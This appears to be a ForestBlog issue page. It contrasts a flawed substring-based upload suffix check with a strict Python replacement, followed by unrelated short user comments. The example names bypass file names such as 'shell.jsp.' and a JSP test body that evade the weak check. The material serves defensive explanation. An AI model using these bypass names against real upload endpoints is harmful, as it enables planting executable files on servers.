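The two upload issues on this page (the suffix check in "File upload bypass exists" and the unauthenticated, unrestricted endpoint above), as an added example that is not part of either issue or of ForestBlog's code. `weak_suffix_allowed` mirrors the Java check quoted in the earlier issue: `allowSuffix.indexOf(suffix)` is substring containment against ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz", so any suffix that occurs inside that string passes, including "." (from a name such as `shell.jsp.`), ".jp" and ".g". The strict version beside it requires an exact, case-insensitive match against a set, rejects names with no extension or a trailing dot, checks the magic bytes of image types so that `<%out.println(1);%>` in a file called `.png` is refused, and stores the file under a server-chosen name; `handle_upload` adds the login check the issue above asks for. The session shape, the stored-name format and the sample file contents are constructed for the example.

```python
import os
import secrets
from typing import Optional, Tuple

ALLOW_SUFFIX = ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz"  # as quoted in the issue


def weak_suffix_allowed(filename: str) -> bool:
    """Mirror of the Java check: allowSuffix.indexOf(suffix) != -1 on the text
    from the last dot onward. Raises, like the original, when there is no dot."""
    suffix = filename[filename.rindex("."):]
    return ALLOW_SUFFIX.find(suffix) != -1


ALLOWED_EXTENSIONS = {"bmp", "jpg", "jpeg", "png", "gif", "pdf", "doc", "zip", "rar", "gz"}

# Leading bytes of the image formats in the allow-list. The other formats are
# left to a separate content check that this example does not show.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "bmp": (b"BM",),
}


def strict_extension(filename: str) -> Optional[str]:
    """Return the normalised extension if it is on the allow-list, else None.
    Path components are dropped, so ../../x.png is just x.png."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.endswith(".") or "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    return ext if ext in ALLOWED_EXTENSIONS else None


def accept_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Strict extension check, content sniffing for images, and a random
    stored name so the client never chooses the path that gets written."""
    ext = strict_extension(filename)
    if ext is None:
        return False, "extension not allowed"
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, f"{secrets.token_hex(16)}.{ext}"


def handle_upload(session: dict, filename: str, content: bytes) -> dict:
    """Endpoint wrapper: require a logged-in session first (the issue above
    shows the request succeeding with an empty Cookie), then validate."""
    if not session.get("user_id"):
        return {"status": 401, "error": "login required"}
    ok, result = accept_upload(filename, content)
    if not ok:
        return {"status": 400, "error": result}
    return {"status": 200, "stored_as": result}


if __name__ == "__main__":
    # Constructed samples: a minimal PNG header and the JSP body from the issue.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    jsp = b"<%out.println(1);%>"
    for name in ("photo.jpg", "shell.jsp", "shell.jsp.", "shell.jp"):
        print(f"weak check {name!r}: {weak_suffix_allowed(name)}")
    print(handle_upload({}, "avatar.png", png))
    print(handle_upload({"user_id": 7}, "21.jsp", jsp))
    print(handle_upload({"user_id": 7}, "fake.png", jsp))
    print(handle_upload({"user_id": 7}, "avatar.png", png))
```

Because the uploads directory is mapped as a Tomcat Context in the README setup, anything stored there with a .jsp name is executed when requested, so the extension decision has to be made on the server side and the stored name must never be the client's.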

Question

Why is there a PHP link in the redirect?

Hello, fellow student from Normal University

Could we chat on WeChat? I am a senior now, interning in Shenzhen and also doing back-end development. Your technical skills are solid; go for a big-company internship in next year's spring recruiting.
